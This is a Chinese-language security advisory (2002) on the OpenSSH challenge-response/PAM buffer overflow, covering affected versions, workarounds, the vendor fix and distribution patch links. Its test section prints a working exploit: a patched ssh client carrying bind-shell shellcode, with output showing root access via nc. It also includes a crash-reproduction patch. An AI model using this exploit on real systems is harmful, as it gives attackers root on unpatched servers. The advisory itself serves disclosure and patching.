首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第33期->最新漏洞
期刊号: 类型: 关键词:
OpenSSH挑战响应(Challenge-Response)机制交互键盘PAM验证远程缓冲区溢出漏洞

日期:2002-07-17

发布日期: 2002-6-28
更新日期: 2002-6-28
受影响的系统:  
OpenSSH OpenSSH 3.3 p1
OpenSSH OpenSSH 3.3
OpenSSH OpenSSH 3.2.3 p1
OpenSSH OpenSSH 3.2.2 p1
OpenSSH OpenSSH 3.2
OpenSSH OpenSSH 3.1 p1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.0.2
OpenSSH OpenSSH 3.0.2
OpenSSH OpenSSH 3.0.1
OpenSSH OpenSSH 2.9p2
OpenSSH OpenSSH 2.9p1
OpenSSH OpenSSH 2.9.9
OpenSSH OpenSSH 2.9
OpenSSH OpenSSH 2.5.2
OpenSSH OpenSSH 2.5.1
OpenSSH OpenSSH 2.5
OpenSSH OpenSSH 2.3
OpenSSH OpenSSH 2.2
OpenSSH OpenSSH 2.1.1
OpenSSH OpenSSH 2.1
OpenSSH OpenSSH 2.0
OpenSSH OpenSSH 1.2.3
OpenSSH OpenSSH 1.2.2

不受影响系统:  
OpenSSH OpenSSH 3.4 p1
OpenSSH OpenSSH 3.4

描述:
---------------------------------------------------------------------

BUGTRAQ  ID: 5093
CVE(CAN) ID: CAN-2002-0640

OpenSSH是一种开放源码的SSH协议的实现,初始版本用于OpenBSD平台,现在已经被移植到多种Unix/Linux类操作系统下。

OpenSSH 2.3.1p1到3.3版本中的挑战响应(Challenge-Response)代码处理存在漏洞,远程攻击者可以利用这漏洞以sshd进程的权限(通常是root)在系统上执行任意指令。

漏洞是在挑战响应验证阶段处理接收到的应答时存在缓冲区溢出,不管系统中挑战响应验证选项是否配置,系统如果使用了通过交互键盘PAM验证PAMAuthenticationViaKbdInt)的PAM模块,就存在此漏洞,远程攻击者可以利用此漏洞在系统上以sshd进程的权限执行任意指令。

<*来源:Mark Dowd
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-06/0298.html
        http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-040.php
        http://www.suse.com/de/support/security/2002_023_openssh.html
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000500
        http://www.cert.org/advisories/CA-2002-18.html
        http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584
        http://www.debian.org/security/2002/dsa-134
        http://www.openssh.com/txt/preauth.adv
        ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-0005.txt.asc
        http://www.caldera.com/support/security/advisories/CSSA-2002-030.0.txt
        https://www.redhat.com/support/errata/RHSA-2002-127.html
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502
*>

测试程序:
----------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Joe Testa <jtesta@rapid7.com>提供如下测试方法:

1)编译时支持PAM和S/KEY验证。

2)采用如下补丁修补ssh客户端:

- --- sshconnect2.c.bak    Thu Jun 27 11:54:54 2002
+++ sshconnect2.c    Thu Jun 27 11:56:27 2002
@@ -866,6 +866,7 @@
     xfree(lang);

     num_prompts = packet_get_int();
+    num_prompts = 2;
     /*
      * Begin to build info response packet based on prompts requested.
      * We commit to providing the correct number of responses, so if
@@ -877,15 +878,16 @@

     debug2("input_userauth_info_req: num_prompts %d", num_prompts);
     for (i = 0; i < num_prompts; i++) {
+      if ( i == 0 ) {
         prompt = packet_get_string(NULL);
         echo = packet_get_char();

         response = read_passphrase(prompt, echo ? RP_ECHO : 0);
- -
+      }
         packet_put_cstring(response);
- -        memset(response, 0, strlen(response));
+        /*memset(response, 0, strlen(response));
         xfree(response);
- -        xfree(prompt);
+        xfree(prompt);*/
     }
     packet_check_eom(); /* done with parsing incoming message. */

3) 在'sshd_config'配置文件中增加"PAMAuthenticationViaKbdInt yes"选项。

4) 使用修改过的ssh连接SSHD守护程序。

在SSHD服务器端:

[root@wonderland hi_chad]# gdb /usr/sbin/sshd
GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run -d
Starting program: /usr/sbin/sshd -d
debug1: sshd version OpenSSH_3.2.3p1
debug1: private host key: #0 type 0 RSA1
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 33208
debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
debug1: dh_gen_key: priv key bits set: 124/256
debug1: bits set: 1626/3191
debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
debug1: bits set: 1597/3191
debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user jdog service ssh-connection method none
debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog"
debug1: PAM setting rhost to "localhost.localdomain"
Failed none for jdog from 127.0.0.1 port 33208 ssh2
debug1: userauth-request for user jdog service ssh-connection method
keyboard-interactive
debug1: attempt 1 failures 1
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=jdog devs=
debug1: kbdint_alloc: devices 'skey'
debug1: auth2_challenge_start: trying authentication method 'skey'
debug1: got 2 responses
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08053822 in strcpy ()
(gdb)

Christophe Devine(devine@iie.cnam.fr) 提供了测试程序:

1. Download openssh-3.2.2p1.tar.gz and untar it


~ $ tar -xvzf openssh-3.2.2p1.tar.gz


2. Apply the patch provided below by running:


~/openssh-3.2.2p1 $ patch < path_to_diff_file


3. Compile the patched client


~/openssh-3.2.2p1 $ ./configure && make ssh


4. Run the evil ssh:


~/openssh-3.2.2p1 $ ./ssh root:skey@localhost


5. If the sploit worked, you can connect to port 128 in another terminal:


~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)


--- sshconnect2.c Sun Mar 31 20:49:39 2002
+++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002
@@ -839,6 +839,56 @@
/*
  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE
  */
+
+int do_syscall( int nb_args, int syscall_num, ... );
+
+void shellcode( void )
+{
+ int server_sock, client_sock, len;
+ struct sockaddr_in server_addr;
+ char rootshell[12], *argv[2], *envp[1];
+
+ server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
+ server_addr.sin_addr.s_addr = 0;
+ server_addr.sin_port = 32768;
+ server_addr.sin_family = AF_INET;
+ do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr,
16 );
+ do_syscall( 2, 106, server_sock, 1 );
+ client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
+ &server_addr, &len );
+ do_syscall( 2, 90, client_sock, 0 );
+ do_syscall( 2, 90, client_sock, 1 );
+ do_syscall( 2, 90, client_sock, 2 );
+ * (int *) ( rootshell + 0 ) = 0x6E69622F;
+ * (int *) ( rootshell + 4 ) = 0x0068732f;
+ * (int *) ( rootshell + 8 ) = 0;
+ argv[0] = rootshell;
+ argv[1] = 0;
+ envp[0] = 0;
+ do_syscall( 3, 59, rootshell, argv, envp );
+}
+
+int do_syscall( int nb_args, int syscall_num, ... )
+{
+ int ret;
+ asm(
+ "mov 8(%ebp), %eax; "
+ "add $3,%eax; "
+ "shl $2,%eax; "
+ "add %ebp,%eax; "
+ "mov 8(%ebp), %ecx; "
+ "push_args: "
+ "push (%eax); "
+ "sub $4, %eax; "
+ "loop push_args; "
+ "mov 12(%ebp), %eax; "
+ "push $0; "
+ "int $0x80; "
+ "mov %eax,-4(%ebp)"
+ );
+ return( ret );
+}
+
void
input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
{
@@ -865,7 +915,7 @@
         xfree(inst);
         xfree(lang);
  
- num_prompts = packet_get_int();
+ num_prompts = 1073741824 + 1024;
         /*
          * Begin to build info response packet based on prompts requested.
          * We commit to providing the correct number of responses, so if
@@ -874,6 +924,13 @@
          */
         packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
         packet_put_int(num_prompts);
+
+ for( i = 0; i < 1045; i++ )
+ packet_put_cstring( "xxxxxxxxxx" );
+
+ packet_put_string( shellcode, 2047 );
+ packet_send();
+ return;
  
         debug2("input_userauth_info_req: num_prompts %d", num_prompts);
         for (i = 0; i < num_prompts; i++) {

----------------------------------------------------------------------
建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*  1)关闭SSH协议版本2:

由于这两个漏洞只存在与SSH协议版本2中,所以关闭SSH协议版本2的使用就可以防止这两个漏洞被利用,可以通过修改/etc/ssh/sshd_config配置文件完成:

Protocol 1

*  2)关闭挑战响应(Challenge-Response)验证选项:

2.9版本以上的OpenSSH,系统管理员可以通过在SSHD配置文件中设置"ChallengeResponseAuthentication"为"no",在/etc/ssh/sshd_config中修改为如下一行:

ChallengeResponseAuthentication no

这可以防止如果使用SKEY或者BSD_AUTH验证的情况下漏洞不被利用,不过不能防止通过交互键盘PAM验证(PAMAuthenticationViaKbdInt)模式引起的漏洞。

*  3)关闭通过交互键盘PAM验证模式:

2.9版本以上的OpenSSH,系统管理员可以通过在SSHD配置文件中设置"PAMAuthenticationViaKbdInt"为"no",在/etc/ssh/sshd_config中修改为如下一行:

PAMAuthenticationViaKbdInt no

此选项默认设置为"no",这可以防止如果使用通过交互键盘PAM验证的情况下漏洞不被利用,不过不能防止使用SKEY或者BSD_AUTH验证模式引起的漏洞。

*  4)在旧版本OpenSSH中关闭两个选项:

在OpenSSH 2.3.1p1和2.9之间的版本,系统管理员可以设置如下选项来防止这两个漏洞被利用:

KbdInteractiveAuthentication no
ChallengeResponseAuthentication no

*  5)使用权限分离最小化漏洞影响:

OpenSSH 3.2或者3.3版本可以使用"UsePrivilegeSeparation"选项进行权限分离,可以通过在/etc/ssh/sshd_config中增加如下一行完成:

UsePrivilegeSeparation yes

此解决方案不能防止漏洞被利用,只是由于权利分离机制,攻击者即使成功利用这两个漏洞而获得shell,也是处于chroot受限制的环境中,此解决方案也不能防止攻击者进行拒绝服务攻击。建议管理员升级程序或者采用补丁进行修补。

厂商补丁:

Caldera
-------
Caldera已经为此发布了一个安全公告(CSSA-2002-030.0):
CSSA-2002-030.0:Linux: OpenSSH Vulnerabilities in Challenge Response Handling
链接:http://www.caldera.com/support/security/advisories/CSSA-2002-030.0.txt

Conectiva
---------
Conectiva已经为此发布了一个安全公告(CLA-2002:502)以及相应补丁:
CLA-2002:502:openssh
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502

补丁下载:
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssh-3.4p1-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-gnome-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-clients-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-server-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openssh-3.4p1-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-gnome-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-clients-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-server-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssh-3.4p1-1U8_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-gnome-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-clients-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-server-3.4p1-1U8_1cl.i386.rpm

Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:

- 把以下的文本行加入到/etc/apt/sources.list文件中:
  
rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(如果你不是使用6.0版本,用合适的版本号代替上面的6.0)

- 执行:                 apt-get update
- 更新以后,再执行:     apt-get upgrade

Debian
------
Debian已经为此发布了一个安全公告(DSA-134-4)以及相应补丁:
DSA-134-4:OpenSSH Remote Challenge Vulnerability
链接:http://www.debian.org/security/2002/dsa-134

补丁下载:

Source archives:

http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1.orig.tar.gz
Size/MD5 checksum:   837668 459c1d0262e939d6432f193c7a4ba8a8
http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.dsc
Size/MD5 checksum:      871 dd0f18d576520cb7110f5791bce67708
http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.diff.gz
Size/MD5 checksum:    33706 ff798880b0835dcc77e42a2b9a075148
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz
Size/MD5 checksum:  2153980 c8261d93317635d56df55650c6aeb3dc
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.diff.gz
Size/MD5 checksum:    37925 718ffc86669ae06b22d77c659400f4e8
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.dsc
Size/MD5 checksum:      784 b197de235e0d10f7bb66b4751808a033

Architecture independent packages:

http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-0.potato.1_all.deb
Size/MD5 checksum:      976 6b39f5a320b1c8bdbba05e2c8b041b70

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.4p1-0.0potato1_alpha.deb
Size/MD5 checksum:    34968 3e1792f1e5746c5ba7db3e025df60cbe
http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_alpha.deb
Size/MD5 checksum:   865634 52934fd0175f560735a9a4664363791a
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-0.potato.1_alpha.deb
Size/MD5 checksum:   589696 f0263fe6848b8bd09ad07a370ed6310a
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1_alpha.deb
Size/MD5 checksum:   746344 5a06b3db8f6eabf063c3099cb539ffe9
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-0.potato.1_alpha.deb
Size/MD5 checksum:  1548926 377068d478722db72c2fe52f3c23312b

arm architecture (ARM)

http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.4p1-0.0potato1_arm.deb
Size/MD5 checksum:    34202 ee81aaf2953dc0524878e906ff47a3f2
http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_arm.deb
Size/MD5 checksum:   664270 a61eb2a3cac706dcc6e6985bf7cf7817
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-0.potato.1_arm.deb
Size/MD5 checksum:   468106 c1dc499d7a06db8e831906f942d1192e
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-0.potato.1_arm.deb
Size/MD5 checksum:  1348440 7fb0b6f32b6eb2dfc78391a302bd0e02
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1_arm.deb
Size/MD5 checksum:   728932 0a9872153979c364d41208082c80772d

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_i386.deb
Size/MD5 checksum:   642966 b782a41d2d37003242835772cfc24c88
http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.4p1-0.0potato1_i386.deb
Size/MD5 checksum:    34500 ecb44504ec7c8f6470162f74d62b278f
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-0.potato.1_i386.deb
Size/MD5 checksum:  1290006 362451bafdf4fe2104e54a0336893519
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-0.potato.1_i386.deb
Size/MD5 checksum:   461994 a1c785ce6982b9031410362f124d873a
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1_i386.deb
Size/MD5 checksum:   730338 747306c7e4ef0b767cb2985b74047b05

m68k architecture (Motorola Mc680x0)

http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_m68k.deb
Size/MD5 ch


补丁安装方法:

1. 手工安装补丁包:

  首先,使用下面的命令来下载补丁软件:
  # wget url  (url是补丁下载链接地址)

  然后,使用下面的命令来安装补丁:  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包:

   首先,使用下面的命令更新内部数据库:
   # apt-get update
  
   然后,使用下面的命令安装更新软件包:
   # apt-get upgrade

MandrakeSoft
------------
MandrakeSoft已经为此发布了一个安全公告(MDKSA-2002:040)以及相应补丁:
MDKSA-2002:040:openssh
链接:http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-040.php

补丁下载:

Updated Packages:

Linux-Mandrake 7.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Linux-Mandrake 7.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.0:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.0/ppc:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-askpass-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-clients-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-server-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.1/ia64:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-askpass-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-clients-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-server-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.2/ppc:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-askpass-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-clients-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-server-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Corporate Server 1.0.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Single Network Firewall 7.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
http://www.mandrakesecure.net/en/ftp.php

NetBSD
------
NetBSD已经为此发布了一个安全公告(NetBSD-SA2002-005)以及相应补丁:
NetBSD-SA2002-005:OpenSSH protocol version 2 challenge-response authentication vulnerability
链接:ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-0005.txt.asc

升级软件到新版本:

更新CVS、重编译安装软件:
  
# cd src
# cvs update -d -P crypto/dist/ssh usr.bin/ssh
# cd usr.bin/ssh

# make cleandir dependall
# make install

OpenSSH
-------
OpenSSH已经为此发布了一个安全公告(OSSH-20020627)以及相应补丁:
OSSH-20020627:Revised OpenSSH Security Advisory (adv.iss)
链接:http://www.openssh.com/txt/preauth.adv

厂商提供了如下的补丁:

Index: auth2-pam.c
===================================================================
RCS file: /var/cvs/openssh/auth2-pam.c,v
retrieving revision 1.12
diff -u -r1.12 auth2-pam.c
--- auth2-pam.c    22 Jan 2002 12:43:13 -0000    1.12
+++ auth2-pam.c    26 Jun 2002 10:12:31 -0000
@@ -140,6 +140,15 @@
    nresp = packet_get_int();    /* Number of responses. */
    debug("got %d responses", nresp);

+
+    if (nresp != context_pam2.num_expected)
+        fatal("%s: Received incorrect number of responses "
+            "(received %u, expected %u)", __func__, nresp,
+            context_pam2.num_expected);
+
+    if (nresp > 100)
+        fatal("%s: too many replies", __func__);
+
    for (i = 0; i < nresp; i++) {
        int j = context_pam2.prompts[i];

上述补丁只修复了本安全漏洞,但是由于openssh 3.3以及更低版本中还存在其他一些潜在的安全问题,这些已经在openssh 3.4中修复,因此建议您尽快升级到openssh 3.4或者更高版本.

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2002:127-18)以及相应补丁:
RHSA-2002:127-18:Updated OpenSSH packages fix various security issues
链接:https://www.redhat.com/support/errata/RHSA-2002-127.html

补丁下载:
Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/openssh-3.1p1-5.src.rpm

alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-askpass-3.1p1-5.alpha.rpm
